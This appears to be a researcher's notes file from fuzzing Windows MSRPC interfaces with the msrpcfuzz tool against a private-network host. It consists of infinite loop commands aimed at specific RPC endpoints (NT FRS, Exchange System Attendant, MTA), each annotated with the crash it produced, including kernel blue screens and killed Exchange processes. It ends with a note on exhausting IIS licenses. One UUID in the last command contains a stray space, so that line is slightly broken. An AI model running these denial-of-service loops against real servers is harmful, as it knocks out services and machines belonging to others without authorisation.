#fun error messages from NT FRS
while [ 1 ]; do ./msrpcfuzz 192.168.1.103 1111 d049b186-814f-11d1-9a3c-00c04fc9b232 8a885d04-1ceb-11c9-9fe8-08002b104860 1 2 3 51000 8; done

#stack fault in kernel!!! Fills up memory and causes blue screens
#annotation=MS Exchange System Attendant Public Interface
#uuid=469d6ec0-0d87-11ce-b13f-00aa003bac6c, version=16
#ncacn_ip_tcp:192.168.1.103[1174]
while [ 1 ]; do ./msrpcfuzz 192.168.1.103 1174 469d6ec0-0d87-11ce-b13f-00aa003bac6c 8a885d04-1ceb-11c9-9fe8-08002b104860 16 2 0 51000 8; done

#kills MTA with c000005 read eimsmta.exe
while [ 1 ]; do ./msrpcfuzz 192.168.1.103 1333 9e8ee830-4459-11ce-979b-00aa005ffebe 8a885d04-1ceb-11c9-9fe8-08002b104860 2 2 1 51000 8; done

#same process, difference read exception
 while [ 1 ]; do ./msrpcfuzz 192.168.1.103 3732 9e8ee830-44 59-11ce-979b-00aa005ffebe 8a885d04-1ceb-11c9-9fe8-08002b104860 2 2 3 51000 8; done


It's also possible to completely exhaust IIS of licenses with ./generic and any of these .spks
